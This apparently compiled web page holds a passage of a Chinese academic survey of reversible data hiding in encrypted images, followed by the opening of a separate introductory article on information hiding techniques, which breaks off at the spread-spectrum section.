可分离的非密文域嵌入算法主要是引入无损压缩技术,其获取可嵌入特征的方法是在密文的特定位置填充或扩展得到额外的冗余数据用于数据嵌入,代表性算法如可分离的密文***像信息隐藏[19],算法的嵌入过程如***7:首先对大小为M×N的原始***像进行1阶离散小波变换(Discrete Wavelet Transform, DWT),得到低频系数LL,高频系数LH、HL、HH,大小均为M/2×N/2;使用加密密钥,将LL与随机序列逐位异或进行加密得到En(LL),将LH、HL、HH三部分数据进行Arnold置乱,破坏***像纹理的可视性,完成***像加密;在密文矩阵中添加冗余矩阵B,B为M/2×N/2的零矩阵,将大小为M/2×N/2的En(LL)变形为M/4×N的矩阵En(LL)′置于原密文矩阵顶部,冗余矩阵B可使用隐写密钥嵌入秘密信息得到B′;此时的密文数据包括密文***像与秘密信息两部分,大于原始***像,最后使用压缩传感(Compressive Sensing, CS)技术将包含密文与秘密信息的数据压缩成原始***像大小,作为携密密文。而载体恢复与数据提取时,首先进行解压,而后分别使用解密密钥或隐写密钥即可***进行解密或提取操作。

由***7的过程中可以知道该算法实现的关键步骤在于CS技术将密文与秘密信息压缩成原始载体的大小,而解密与提取过程可分离实现的前提在于压缩过程的可逆性,具体的嵌入方法可采用传统的隐藏技术或简单的秘密信息的填充。类似通过引入或发现信息冗余来实现嵌入的算法如文献[20-21]:其中文献[20]是在像素加密前对一些像素进行数值预测,并在可预测像素的差值中嵌入数据,其可逆效果较好,而且提取与解密过程可分离;文献[21]实现模型与文献[19]基本相似,其过程可概括为***8的流程示意。另外,压缩感知技术同时具有数据压缩和隐私保护功能,是当前***像处理领域的热点技术之一,基于压缩传感***像的可逆信息隐藏算法如文献[22-23],为当前密文载体环境下的可逆信息隐藏技术发展提供了新的技术思路。

由上可知,非密文域嵌入算法较好地借鉴了传统的嵌入技术,其中可分离算法强调携密密文的解密过程与信息提取过程的可分离,与不可分离算法相比,适用于更多的应用环境。但是这一类算法的可嵌入特征受加密与压缩技术限制较大,嵌入量较小。在安全性方面,不可分离算法中的保留特征会导致密文中含有部分原始信息,如***5中的携密密文***像的仿真结果带有原始***像的纹理特征,威胁载体内容的保密性;可分离算法中的解压与解密过程会造成秘密信息泄露,影响嵌入信息的安全性。由于大部分非密文域嵌入算法在安全性方面存在一定的不足,因此当前研究更关注于密文域嵌入类的算法。

2.2 密文域嵌入算法

密文域嵌入算法中的数据嵌入过程完全在加密域上进行,不会造成原始信息泄露。实现嵌入的关键技术主要有基于***像加密技术、密文域信息处理技术如同态技术与熵编码、密文域压缩等。依据嵌入后携密载体的解密过程与提取过程顺序是否固定,密文域嵌入算法也分为可分离与不可分离两类,下面分别进行说明。

2.2.1 不可分离的密文域嵌入算法

不可分离算法是当前密文域可逆信息隐藏算法的主体,根据算法过程中解密与信息提取的先后顺序,可分为***9所示的两类模型,不同类型的嵌入方式所基于的技术不同。

1)基于***像加密技术。

密文域操作的对象需要加密技术作为前提,信息隐藏的载体通常集中于***像载体,因此基于***像加密技术的密文域可逆信息隐藏是当前该领域算法的重要组成。***9(a)代表类型算法的关键技术在于轻量级的***像加密技术与信息隐藏技术的结合,其中信息的提取与恢复依赖于解密***像的特征分析,因此要求先进行***像的解密,再提取秘密信息。代表性算法如文献[5],它首次将***像加密和信息隐藏结合,提出密文***像中的可逆信息隐藏算法,算法过程如***10所示依次包括4个部分:***像加密、数据嵌入、***像解密和秘密信息提取与载体恢复。下面具体说明并分析方案[5]的过程:

式(8)表明恢复数据中存在失真,只是将失真的程度控制在人眼视觉不可分辨范围内,而且算法中信息提取是基于自然***像的像素相关性,因此提取前需要先进行***像解密,两过程不可交换。之后文献[24]通过改进失真函数提升了这种方案的可逆性能。在此基础上,文献[25-26]也进一步提高了嵌入容量,但是嵌入量提高后的载体***片解密失真会有所增大;类似算法如文献[27]提出在加密的JPEG比特流中嵌入可逆信息以及文献[28]提出基于邻域像素平均差值的密文域可逆信息隐藏算法,也存在嵌入容量提高后,载体数据的恢复效果下降的问题。文献[29]引入随机扩散的方法进一步有效利用了文献[5]中的像素空域关联性,通过设计精确预测的算法在降低解密差错的同时,提高了嵌入容量;文献[30]进一步在保持解密质量的前提下提高了嵌入容量。

2)基于编码技术。

为了能够进一步保证载体恢复的可逆性,有效提高嵌入容量,编码技术被引入可逆算法,基于编码过程的可逆性,该类算法的数据恢复过程失真很小,但是对密文码字编码来实现嵌入后,为保证解码的可逆性,需要嵌入后码字的解码过程顺序固定,因此在数据解密前必须先进行信息提取,不可分离。算法的基本模型如***9(b)所示,编码技术在信息隐藏技术中的应用较为广泛,如湿纸编码[31]、动态运行编码[32]、方向编码[33-34]等。文献[35]将低密度奇偶校验码(Low Density Parity Check,LDPC)编码引入密文域可逆信息隐藏,将载荷提升到0.1bpp;而文献[36]提出利用熵编码实现密文域可逆嵌入,能够完全保证可逆性。

文献[36]基于GRC (Golomb-Rice Codewords)熵编码提出了不依赖于加密方式的通用密文域信号的可逆嵌入,载体能够被完全可逆恢复,并且单位比特密文最大可实现嵌入0.169b信息,其具体嵌入过程如***11所示:编码的对象是加密数据的01码字,如***11步骤(a)中密文***像的码字组IC,每个码字ICi的长度L为3,然后根据不同***像码字ICi的频率建立映射表Mapping table,并将ICi替换为GRC映射码如步骤(b)、(c)所示,通过对得到的GRC码进行修整与位填充,得到含有编码冗余的GRC修整码如步骤(e)所示,最后将附加信息嵌入步骤(e)得到的GRC修整码中的特定位置如步骤(f)所示,其中附加信息如步骤(d)所示,主要包括三部分信息:每个GRC码的指示码q组成的指示码序列;原始密文***像码字;额外信息。附加信息的前两部分都用于后期密文码字的可逆恢复,而额外信息可以负载秘密信息。而通过对***11中步骤按步骤(f)~(a)依次操作,可有效实现嵌入信息的提取并进一步完全恢复原始密文。但是根据上面的说明也可以知道,该算法的可逆性完全依赖其嵌入过程的编码可逆性,解密之前需要先进行信息提取,其先后顺序要求固定,因此不能实现可分离。

2.2.2 可分离的密文域嵌入算法

1)基于同态加密技术。

同态加密技术对于密文域信号处理技术的发展意义重大,其特点在于允许在加密域直接对密文数据进行操作 (如加或乘运算),而不需要解密原始数据,操作过程不会泄露任何明文信息。在操作之后,将数据解密,得到的结果等同于直接在明文数据上进行相同操作后的结果。当前加密技术在隐私保护过程中被普遍使用,同态加密技术保证了加密域数据与明文域信息的同态变换,能够直接在密文域实现对密文的管理,同态加密根据其满足同态运算的类型与可执行次数,主要可分为全同态、类同态与单同态加密,其中全同态算法可同态执行任意次数的加乘运算,类同态算法可同态执行有限次数的加/乘运算,单同态算法只满足加或乘同态。当前同态技术的研究重点在于设计全同态与类同态算法,因为单同态算法如加同态只能用于构造对称密码,其应用场景较少。可逆信息隐藏算法中的重要一类是利用同态加密技术进行数据嵌入,同态加密技术的引入为信息隐藏技术与加密技术的深度结合提供了重要的技术支持与理论保证。

如文献[37-38]等属于在密文域信息隐藏领域引入了同态加密技术的早期算法,文献[37]用Okamoto-Uchiyama公钥密码[39]加密载体数据,利用类同态技术适应性替换量化后的密文***像DCT系数来嵌入数字水印。为了进一步保证嵌入信息的后密文数据的安全性,文献[8]提出了一种基于全同态加密技术的可证明安全的密文域隐写方案。

文献[8]的算法模型如***12所示,其中携密密文的生成主要包括嵌入、加密两个过程。其中嵌入过程是在明文***像中进行,采用STC(Syndrome Trellis Codes)编码方法在各像素的LSB层进行标记湿纸信道,然后使用文献[40]中算法,在各像素的次LSB层的湿纸信道上完成消息的嵌入。接收方对载密***像的 LSB 序列和次 LSB 序列分别执行STC解码算法和湿纸码的解码算法即可提取消息。上述嵌入方法避开了容易受统计检测攻击的载体***像敏感区域。文献[8]的主要创新点在于嵌入后,基于文献[41]中的算法设计了一种修正的全同态算法对载密数据进行加密,能够有效保证同态性及密文域上的信号处理。

其中,式(9)和式(10)表明,接收方无需解密,即可得到密文数据的 LSB 层和次 LSB 层,然后从中提取秘密信息。最后,文献[8]通过可证明安全理论推导说明了算法在密文域和明文域均能有效抵抗隐写检测分析,并且在通信双方被强制要求解密、加密密钥泄漏和密钥未泄露三种情形下都具有较高的安全性。通过上面分析可知,类似文献[8]使用全同态技术在密文域进行数据嵌入与提取的算法具有较好可操作性与安全性,同态技术的发展也给相关密文域信息隐藏的发展与实现提供了一定的理论支持,并且能够较好地实现算法的可分离。文献[8]为密文域可逆信息隐藏引入同态技术提供了可参考的技术框架,框架流程如***13示意:由于同态技术在密文域的操作能够保持对明文域的同态操作,因此明文的嵌入算法可直接使用现有的非密文域可逆算法,而后用全同态技术加密。对于携密密文,可分离性具体表现为:直接在密文域执行提取算法的同态操作可在不解密明文载体的情况下得到秘密信息;对携密密文进行解密得到携密明文,此时在明文域分别进行信息提取或可逆恢复,即可得到秘密信息或原始明文。

近年来,使用同态技术实现的密文域可逆信息隐藏算法还包括文献[42-43],均具有较大的嵌入容量及较好的***像质量。文献[42]首先将明文像素值分成LSB位与余下的整数,加密后分别发送给信息隐藏者,因此传输的数据量为原加密***像的两倍,嵌入信息过程中,主要是利用同态特性改变相邻LSB的相对大小。但是在密文域同态加密后的数据无法判断对应明文的大小,因此提取信息前必须解密***像;文献[43]中首先提出了一种基于同态加密的可逆算法,过程如***14所示:先对明文像素值用直方***平移的方式进行收缩约束,然后在同态加密前后通过两次信息嵌入,确保信息在嵌入后的密文中或直接解密***像中都可以提取,其中湿纸编码[40]嵌入确保信息可直接在密文域提取,直方***平移嵌入确保信息可在解密***像进行提取。该算法的数据量在嵌入前后保持不变,但是由于湿纸编码嵌入时,需要求解k个变量的线性方程,计算复杂度为O(k3),运算成本较大;同时由于Paillier同态加密算法[44]加密时引入的随机因子在解密过程中会约去,因此任意替换随机因子不影响解密结果,基于此文献[43]中还提出一种无损嵌入方法,将加密时的原随机因子调整为携带秘密信息的随机因子而不影响解密正确性。

为了降低文献[43]的运算成本,提高加密与嵌入效率,文献[45]针对文献[43]中的可逆算法进行了改进:首先将目标像素嵌入到载体***像中,加密后利用由额外信息组成的伪像素替换载体中的目标像素实现信息嵌入;提取信息时,可根据嵌入密钥与伪像素值在密文域的映射表求出伪像素的可能值,通过对比来确定嵌入信息。该算法中密文数据量相对较低,计算复杂度为O(k)。

与其他密码体制相比,当前大部分全同态或类密码系统会使加密数据量产生明显扩张与运算复杂度的急剧增高,因此基于全同态加密的可逆信息隐藏方案的计算复杂度普遍较高而嵌入率较低,这也是未来此类算法需要解决的主要问题。而单同态加密算法的密文扩展较小,基于单同态技术的可逆信息隐藏算法如文献[46-47],主要引入加性同态加密技术有效实现了提取、解密过程的可分离,运行效率较高。文献[47]引入十字交叉法选择可嵌入像素点,通过自行构造加性单同态加密算法保证了算法的可逆性,而且密文扩展较小,达到了相对可观的嵌入率。

2)基于密文域压缩技术。

同态算法尤其是全同态加密技术较大的计算复杂度与密文扩展影响了可分离的密文域嵌入算法的效率,可分离算法可以通过引入密文压缩技术有效提高嵌入效率,文献[48]是利用密文压缩技术实现可分离的代表算法。

文献[48]的算法模型如***15所示,提出用矩阵运算的方法对加密的***像的 LSB 进行压缩来腾出空间隐藏信息,在接收方分三种情况:使用隐写密钥可以提取数据;使用解密密钥可以直接解密携密密文***像,两个操作可以单独执行;同时使用隐写密钥与解密密钥可基本实现载体的完全恢复。

在接收方,如果只知道隐写密钥,可以根据密钥在嵌入后密文***像的对应NP个位置中提取像素的LSB,即为秘密信息;如果只知道解密密钥,可直接对嵌入后***像进行解密操作,由于嵌入与压缩变换只是修改了像素的LSB,解密***像的失真一般人眼不能区分;如果同时知道隐写密钥与解密密钥,先进行直接解密,然后将携带秘密信息的NP个像素点利用压缩后保存的信息进行恢复,而由于矩阵运算的不可逆,整个***像的恢复主要基于***像像素间相关性,通过构造失真函数来实现。***16为文献[48]的实验结果,其直接解密得到的***像(***16(d))与原始***像Lena(***16(a))的峰值信噪比(PSNR)值为39.0dB,达到了人眼不可区分的程度。

该方案是完全在加密域上执行的,而且是可分离的,目前能满足这两点的方案非常少,但是该方案的***像恢复和信息提取还是完全建立在***像像素相关性这一统计特征上的,所以恢复***像尤其是直接解密得到的***像存在失真。

3)基于格密码算法。

这类算法主要是有效利用了格密码算法的特点,通过对加密过程产生的数据冗余的再编码进行信息隐藏。格密码算法基于的困难问题当前主要以错误学习(Learning With Error, LWE)问题为主。而LWE算法具有以下三方面特点,可有效用于实现密文域可逆信息隐藏:一是可靠的理论安全性,已知求解LWE问题的算法都运行在指数时间内,能够抵抗量子攻击;二是格空间是一种线性结构,LWE算法中的运算基本是线性运算,加密速度比目前广泛使用的基于大整数分解难题和离散对数难题的公钥密码高出很多,适用于数据量极大的多媒体环境与云环境下的数据加密;三是LWE算法加密后的数据携带大量的信息冗余,这些冗余对于没有私钥的攻击者来说不包含任何有用信息,但是对于拥有私钥的用户来说该部分冗余是可控的。由此,文献[49]提出了基于LWE算法加密过程的可逆信息隐藏,首先是在加密明文序列m∈{0,1}l的过程中,通过对加密冗余的再量化嵌入秘密信息sm=(sm1,sm2,…,sml)T,smi∈{0,1},其加密嵌入过程可概括说明如下:

最后,文献[49]根据理论分析与实验结果说明了载体恢复能够达到完全可逆,其算法仿真结果如***17所示,实验使用Lena为原始***像,加密过程中为直观说明实验结果,采用对原始***像的前7200B数据(***17(a))进行加密并嵌入秘密信息。但是该算法加密后会产生密文扩展,尤其当密钥长度较大时,密文扩展较大,嵌入效率较低。

综上,密文域嵌入算法能够较好保持加密算法的安全性,与非密文域嵌入算法相比也更有研究价值; 但是此类算法中密文嵌入率与载体恢复的可逆性往往相互制约。为了提高嵌入效率,算法设计中较多采用简易的***像加密或序列密码算法[5],使用传统的LSB算法嵌入信息,载体恢复依赖于构造失真函数,但是会造成载体恢复存在一定的失真;为了保证可逆性,其嵌入过程引入无损压缩技术与可逆的编码技术[36];同态技术[8]与密文压缩技术[48]的应用有效实现了可分离的目标,但是依然存在计算复杂度过大或一定条件下失真过大的问题。另外,文献[43,49]主要是通过对一些特定算法加密过程中冗余的利用,来实现密文域可逆信息隐藏,因此需要对加密算法过程进行详细分析,对加密各环节的参数进行一定的控制来实现密文冗余的可控与额外信息嵌入。由于嵌入过程需要对密文数据进行修改,文献[49]对嵌入过程的安全性进行说明。文献[43,49]对携密密文的解密正确性基本能够达到对原始密文解密的正确性,可逆效果相对较好;但是随着密钥长度增大,算法的密文扩展增长较快,如何有效利用这些冗余扩展值得未来进一步研究。其他实现可分离的方法还包括差值预测技术等,如文献[50]虽然实现了解密与提取过程的可分离,而且在已知隐写密钥时可达到无损恢复***像载体,但是其加密没有破坏***像的纹理结构,对载体***像隐私保护的效果有待进一步加强。

3 密文域可逆信息隐藏的技术展望

根据可逆信息隐藏的产生背景与技术要求可知,可逆性是可逆信息隐藏算法区别于其他隐藏算法的关键技术特征,而密文域可逆信息隐藏实现可逆性的重点在于实现携密密文的无差错解密以及载体无失真的恢复。根据数据加密与信息嵌入的不同结合方式,本文将密文域可逆信息隐藏算法分为非密文域嵌入与密文域嵌入两类,其中非密文域嵌入类算法是通过非密文域中操作获得可嵌入特征,通常嵌入过程在加密过程之前或两过程***进行。可逆性是该领域算法的出发点与重要评判标准,非密文域嵌入类的算法[16,19]的解密与恢复过程有效满足了可逆性的技术要求,但是在载体或秘密信息内容安全与隐私保护方面存在一定的不足;密文域嵌入算法引入***像加密技术[5,24-30]、密文域处理技术[8,35,42-43,45-47]、压缩技术[48]等保证了加密的可靠性,但是在可逆性、嵌入容量、算法执行效率等方面,相关算法在最初引入上述技术时会存在一点或几点不足,后续算法不断针对不足进行改进,使各类嵌入技术的实现效果不断完善。在实际应用中,当原始载体内容涉及用户个人隐私时,用户通常不希望在密文管理过程暴露个人信息,因而解密与信息提取过程的可分离能够有效满足载体所有者的隐私保护需要,适用更多的应用场合,因此可分离性是当前密文域可逆信息隐藏算法在实用过程中的重要评价标准。结合第2章的分析与上述总结可知未来该技术的发展重点在于构造可分离的密文域嵌入算法,并不断提高信息嵌入量。基于此,本文认为未来存在以下几个发展趋势:

1)当前算法中数据加密与嵌入的过程往往相互***,造成算法的嵌入率与可逆性相互制约,因此可以在加密过程中有效使用密文扩展产生的冗余数据在嵌入信息,考虑到载体数据量大的特点,未来应面向实现轻量级密码方案与可逆信息隐藏的有效结合。

2)加密信号处理技术的不断发展给该领域提供了技术与理论支持,未来可有效引入新型的加密信号处理技术,如高效的全同态加密技术、熵编码等,来保证嵌入的可逆性,提高算法执行效率。

3)密文域可逆信息隐藏的评价标准也有待完善,合适而有效的评价标准势必会促进相关算法的有效改进与效果的增强。当前的评价标准主要为嵌入率与峰值信噪比(Peak Signal-to-Noise Ratio, PSNR),但是对于密文域信息隐藏,上述标准不能有效说明嵌入过程对于原加密算法安全性的影响以及嵌入信息的不可感知性。当前相关的研究较少,如文献[8]根据密码学的可证明安全性理论对嵌入与加密过程的安全性进行分析;文献[49]结合现代公钥加密与***像加密技术的安全性指标提出嵌入过程的安全性在于嵌入前后密文的统计特性不变,符合密文空间上的均匀分布;文献[51]提出在保证密文熵最大化的前提下进行可逆数据嵌入。

4 结语

近年来,密文域可逆信息隐藏技术不断吸引研究者的关注,并已经取得了较多的研究成果。本文针对该领域的现状与技术要求,分析了现有算法的存在问题与技术难点,通过对相关典型文献的分类论述,分别介绍其应用到的关键技术及相应的局限性,最后指出了该领域的一些发展趋势。随着数据安全性需求的日益增强,密文域可逆信息隐藏技术对于密文域信号处理与信息安全技术的发展及应用有着积极的促进作用,同时其存在的问题有待更进一步的研究。

参考文献:

[1] JOHNSON N F, JAJODIA S. Exploring steganography: seeing the unseen[J]. Computer, 1998, 31(2): 26-34.

[2] 孙圣和, 陆哲明, 牛夏牧. 数字水印技术及应用[M]. 北京:科学出版社, 2004: 5-6.(SUN S H, LU Z M, NIU X M. Digital Watermarking Technology and Application[M]. Beijing: Science Press, 2004: 5-6.)

[3] 王丽娜,张焕国, 叶登攀,等. 信息隐藏技术与应用[M]. 武汉:武汉大学出版社, 2012: 17-18.(WANG L N, ZHANG H G, YE D P, et al. Information Hiding Technology and Application[M]. Wuhan: Wuhan University Press, 2012: 17-18.)

[4] TIAN J. Reversible data embedding using a difference expansion[J].IEEE Transactions on Circuits & Systems for Video Technology, 2003, 13(8): 890-896.

[5] ZHANG X. Reversible data hiding in encrypted image[J]. IEEE Signal Processing Letters, 2011, 18(4): 255-258.

[6] SHI Y, LI X, ZHANG X, et al. Reversible data hiding: advances in the past two decades[J]. IEEE Access, 2016, 4: 3210-3237.

[7] RAJ T J, SIVADASAN E T. A survey paper on various reversible data hiding techniques in encrypted images[C]// Proceedings of the 2015 IEEE International Advance Computing Conference. Piscataway, NJ: IEEE, 2015: 1139-1143.

[8] 陈嘉勇, 王超, 张卫明,等.安全的密文域***像隐写术[J].电子与信息学报, 2012, 34(7): 1721-1726. (CHEN J Y, WANG C, ZHANG W M, et al. A secure image steganographic method in encrypted domain[J]. Journal of Electronics & Information Technology, 2012, 34(7):1721-1726.)

[9] SUN Y, ZHANG X. A kind of covert channel analysis method based on trusted pipeline[C]// Proceedings of the 2011 International Conference on Electrical and Control Engineering. Piscataway, NJ: IEEE, 2011: 5660-5663.

[10] 殷赵霞.面向隐私保护的数字***像隐写方法研究[D].合肥:安徽大学, 2014: 9-12.(YIN Z X. Privacy protection oriented image steganography[D]. Hefei: Anhui University, 2014: 9-12.)

[11] BARNI M, KALKER T, KATZENBEISSER S. Inspiring new research in the field of signal processing in the encrypted domain[J]. IEEE Signal Processing Magazine, 2013, 30(2): 16.

[12] DRAGOI L, COLTUC D. Local-prediction-based difference expansion reversible watermarking[J]. IEEE Transactions on Image Processing, 2014, 23(4): 1779-1790.

[13] CACIULA I, COLTUC D. Improved control for low bit-rate reversible watermarking[C]// Proceedings of the 2014 IEEE International Conference on Acoustics Speech and Signal Processing. Piscataway, NJ: IEEE, 2014:7425-7429.

[14] ZHANG W, HU X, LI X, et al. Recursive histogram modification: establishing equivalency between reversible data hiding and lossless data compression[J]. IEEE Transactions on Image Processing, 2013, 22(7): 2775-2785.

[15] JARALI A, RAO J. Unique LSB compression data hiding method[J]. International Journal of Emerging Science and Engineering, 2013, 2(3):17-21.

[16] CANCELLARO M, BATTISTI F, CARLI M, et al. A commutative digital image watermarking and encryption method in the tree structured Haar transform domain[J]. Signal Processing: Image Communication, 2011, 26(1): 1-12.

[17] ZHAO B, KOU W, LI H, et al. Effective watermarking scheme in the encrypted domain for buyer-seller watermarking protocol[J]. Information Sciences, 2010, 180(23): 4672-4684.

[18] LIAN S, LIU Z, REN Z, et al. Commutative encryption and watermarking in video compression[J].IEEE Transactions on Circuits & Systems for Video Technology, 2007, 17(6): 774-778.

[19] XIAO D, CHEN S K. Separable data hiding in encrypted image based on compressive sensing[J]. Electronics Letters, 2014, 50(8):598-600.

[20] ZHANG W, MA K, YU N. Reversibility improved data hiding in encrypted images[J]. Signal Processing, 2014, 94(1):118-127.

[21] MA K, ZHANG W, ZHAO X, et al. Reversible data hiding in encrypted images by reserving room before encryption[J]. IEEE Transactions on on Information Forensics and Security, 2013, 8(3):553-562.

[22] LI M, XIAO D, ZHANG Y. Reversible data hiding in block compressed sensing images[J]. ETUI Journal, 2016, 38(1): 159-163.

[23] YAMAC M, DIKICI C, SANKUR B. Hiding data in compressive sensed measurements: a conditionally reversible data hiding scheme for compressively sensed measurements[J]. Digital Signal Processing, 2016, 48: 188-200.

[24] HONG W, CHEN T, WU H. An improved reversible data hiding in encrypted images using side match[J]. IEEE Signal Processing Letters, 2012, 19(4): 199-202.

[25] YU J, ZHU G, LI X, et al. Digital forensics and watermarking: an improved algorithm for reversible data hiding in encrypted Image[C]// Proceedings of the 11th international conference on Digital Forensics and Watermaking. Berlin: Springer-Verlag, 2014: 384-394.

[26] WU X, SUN W. High-capacity reversible data hiding in encrypted images by prediction error[J]. Signal Processing, 2014, 104(11): 387-400.

[27] QIAN Z, ZHANG X, WANG S. Reversible data hiding in encrypted JPEG bitstream[J].IEEE Transactions on Multimedia, 2014, 16(5): 1486-1491.

[28] LIAO X, SHU C. Reversible data hiding in encrypted images based on absolute mean difference of multiple neighboring pixels[J]. Journal of Visual Communication and Image Representation, 2015, 28(4): 21-27.

[29] LI M, XIAO D, PENG Z, et al. A modified reversible data hiding in encrypted images using random diffusion and accurate prediction[J]. ETRI Journal, 2014, 36(2): 325-328.

[30] LI M, XIAO D, KULSOOM A, et al. Improved reversible data hiding for encrypted images using full embedding strategy[J]. Electronics Letters, 2015, 51(9): 690-691.

[31] FRIDRICH J, GOLJAN M, LISONEK P. Writing on wet paper[J]. IEEE Transactions on Signal Processing,2005, 53(10): 3923-3935.

[32] ZHANG X, WANG S. Dynamical running coding in digital steganography[J]. IEEE Signal Processing Letters, 2006, 13(3): 165-168.

[33] ZHANG X, WANG S. Efficient steganographic embedding by exploiting modification direction[J]. IEEE Communication Letters, 2006, 13(3): 165-168.

[34] LEE I-S, TSAI W. Data hiding in grayscale images by dynamic programming based on a human visual model[J]. Pattern Recognition, 2009, 42(7): 1604-1611.

[35] ZHANG X, QIAN Z, FENG G, et al. Efficient reversible data hiding in encrypted image[J]. Journal of Visual Communication and Image Representation, 2014,25(2): 322-328.

[36] KARIM M S A, WONG K. Universal data embedding in encrypted domain[J]. Signal Processing, 2014, 94(2):174-182.

[37] KURIBAYASHI M, TANAKA H. Fingerprinting protocol for images based on additive homomorphic property[J]. IEEE Transactions on Image Processing, 2005, 14(12): 2129-2139.

[38] MEMON N, WONG P W. A buyer-seller watermarking protocol[J]. IEEE Transactions on Image Processing, 2001, 10(4): 643-649.

[39] OKAMOTO. T, UCHIYAMA. S. A new public-key cryptosystem as secure as factoring[C]// Proceedings of the 1998 International Conference on the Theory and Application of Cryptographic Techniques. Berlin: Springer, 1998: 308-318.

[40] FRIDRICH J, GOLJAN M, SOUKAL D. Efficient wet paper codes[C]// Proceedings of the 7th International Workshop on Information Hiding, LNCS 3727. Berlin: Springer, 2005: 204-218.

[41] DIJK M V, GENTRY C, HALEVI S, et al. Fully homomorphic encryption over the integers[C]// Proceedings of the 29th Annual International Conference on Theory and Applications of Cryptographic Techniques. Berlin: Springer-Verlag, 2010: 24-43.

[42] CHEN Y C, SHIU C W, HORNG G. Encrypted signal-based reversible data hiding with public key cryptosystem[J]. Journal of Visual Communication and Image Representation, 2014, 25(5): 1164-1170.

[43] ZHANG X P, LOONG J, WANG Z, et al. Lossless and reversible data hiding in encrypted images with public key cryptography[J]. IEEE Transactions on Circuits and Systems for Video Technology, 2015, 26(9): 1622-1631.

[44] PAILLIER P. Public-key cryptosystems based on composite degree residuosity classes[C]// Proceedings of the 17th International Conference on Theory and Application of Cryptographic Techniques, LNCS 1592. Berlin: Spring-Verlag, 1999: 223-238.

[45] 项世***,罗欣荣.同态公钥加密系统的***像可逆信息隐藏算法[J]. 软件学报, 2016, 27(6):1592-1601.(XIANG S J, LUO X R. Reversible data hiding in encrypted image based on homomorphic public key cryptosystem[J]. Journal of Software, 2016, 27(6): 1592-1601.)

[46] ZHANG X. Commutative reversible data hiding and encryption[J]. Security and Communication Networks, 2013, 6(11): 1396-1403.

[47] LI M, XIAO D, ZHANG Y, et al. Reversible data hiding in encrypted images using cross division and additive homomorphism[J]. Signal Processing: Image Communication, 2015,39: 34C248

[48] ZHANG X. Separable reversible data hiding in encrypted image[J]. IEEE Transactions on Information Forensics and Security, 2012,7(2):826-832.

隐藏技术论文篇(11)

中***分类号:TP393 文献标识码:A 文章编号:1009-3044(2009)15-3854-02

Information Security And Information Hiding

SU Pin

(Changzhou Institute of Technology, Changzhou 213000, China)

Abstract: With the development of internet and multimedia, the technology of information hiding has become an important aspect of information security.In this paper, the concept of information hiding is first introduced, then this paper studies the information hiding theories. Finally, this paper presents a brief introduction of main technology and application of information hiding.

Key words: information hiding; information security; copyright protection

1 引言

随着以微电子技术为代表的信息产业的飞速发展,多媒体、计算机网络、个人移动通信技术等进入寻常百姓家,数字化已深入人心。以数字化形式存在的多媒体信息如数字***形***像,数字声音等也是越来越多的人们所感知的主要信息形式。信息技术、计算机网络技术的发展为信息的传播带来了便利,同时也带来了信息传送的安全性问题及信息的非法复制等隐患。如何利用数字多媒体***像及声音的特点来安全传送信息及保护合法版权也成了重要的研究问题。

2 信息隐藏以及基本原理

所谓信息隐藏, 就是将秘密信息隐藏于另一媒体之中(可以为文本文件、数字***像、数字音频和数字视频), 通常称这媒体为掩护媒体, 掩护媒体经嵌入信息后称为伪装媒体, 信息隐藏的本质是利用多媒体信息本身存在较大的冗余性, 同时人眼和人耳本身对某些信息具有一定的掩蔽效应, 这样就可以将信息本身的存在藏起来, 使人察觉不到有信息隐藏在媒体之中, 利用人们“所见即所得”的心理来迷惑恶意的攻击者, 与传统的加密技术不同的是, 非法拦截者从网络上拦截下来的伪装媒体数据在外观上与一般的数据没有什么差别, 不像加密文件那样看起来是一堆会激发非法拦截者破译动机的乱码, 这样就很容易躲过非法拦截者的破解。

信息的嵌入过程如***1所示。 其流程可以用式子表示为B=Func(M,A)。掩护媒体A 可以是***象、声音等。只要A和B给人们的感觉差别不大,就可以认为Func 是一个好的隐藏算法。

3 信息隐藏的特性和分类

掩护媒体经嵌入信息后变成一个伪装媒体。这一嵌入过程需要满足下列条件:

1) 签字信号的不可感知性(即签字信号嵌入后,主信号的感知特性没有明显的改变,签字信号被主信号隐藏了起来) 。

2) 签字信号的鲁棒性。签字信号对主信号的各种失真变换,如失真信号压缩、仿射变换、加噪、A/D。

A 转换等,以及各种恶意性攻击,都应体现出一定的鲁棒性。除非主信号的感知特性被明显的破坏,签字信号将很难被去除。另外,签字信号的嵌入不增加主信号的存储空间和传输带宽。也就是说,签字信号嵌入后, “表面上”很难觉察到信息的改变。信息隐藏的分类如***2所示。

4 信息隐藏常用技术

4.1 替换技术

就是试***用秘密信息比特替换掉伪装载体中不重要的部分,以达到对秘密信息进行编码的目的。替换技术包括最低比特位替换、伪随机置换、载体区域的奇偶校验位置换和基于调色板的***像置换等。

替换技术是在空间域进行的一种操作,通过选择合适的伪装载体和适当的嵌入区域,能够有效地嵌入秘密信息比特,同时又可保证数据的失真度在人的视觉允许范围内。已经提出的各种算法大都给出了其实现思想,如对于基于调色板的***像格式,可操作其调色板来嵌入信息,也可以利用它的量化值来隐藏秘密信息,因此该技术在数据伪装中得到了广泛的应用。替换技术算法简单,容易实现,但是鲁棒性很差,不能抵抗***像尺寸变化、压缩等一些基本的攻击,因此在数字水印领域中一般很少使用。

4.2 变换技术

大部分信息隐藏算法都是在变换域进行的,其变换技术包括离散傅利叶变换(DFT)、离散余弦变换(DCT)和离散小波变换(DWT)等。这些变换技术都有各自的特点,适用于不同的攻击。DFT在信号处理中有着广泛研究,在信息隐藏领域也同样得到了应用。它将***像分割成多个感觉频段,然后选择合适部分来嵌入秘密信息。DCT 使空间域的能量重新分布,从而降低了***像的相关性。在DCT 域中嵌入信息的方法,通常是在一个***像块中调整两个(或多个)DCT系数的相对大小。DWT 是对***像的一种多尺度、空间-频率分解,即将输入信号分解为低分辨率参考信号和一系列细节信号。在一个尺度下,参考信号和细节信号包含了完全恢复上一尺度下信号的全部信息。

变换技术与空间域方法相比的优点是:1) 较好的鲁棒性,能抵抗噪音、压缩等攻击;2) 在变换域中嵌入的水印信号能量,可以分布到空间域所有像素,有利于保证水印的不可见性;3)在变换域中视觉系统的某些特性,如视频特性,可以更方便地结合到水印编码过程中。

当然,变换技术也有其缺点,无法处理诸如共谋和伪造的欺骗性攻击。

4.3 扩频技术

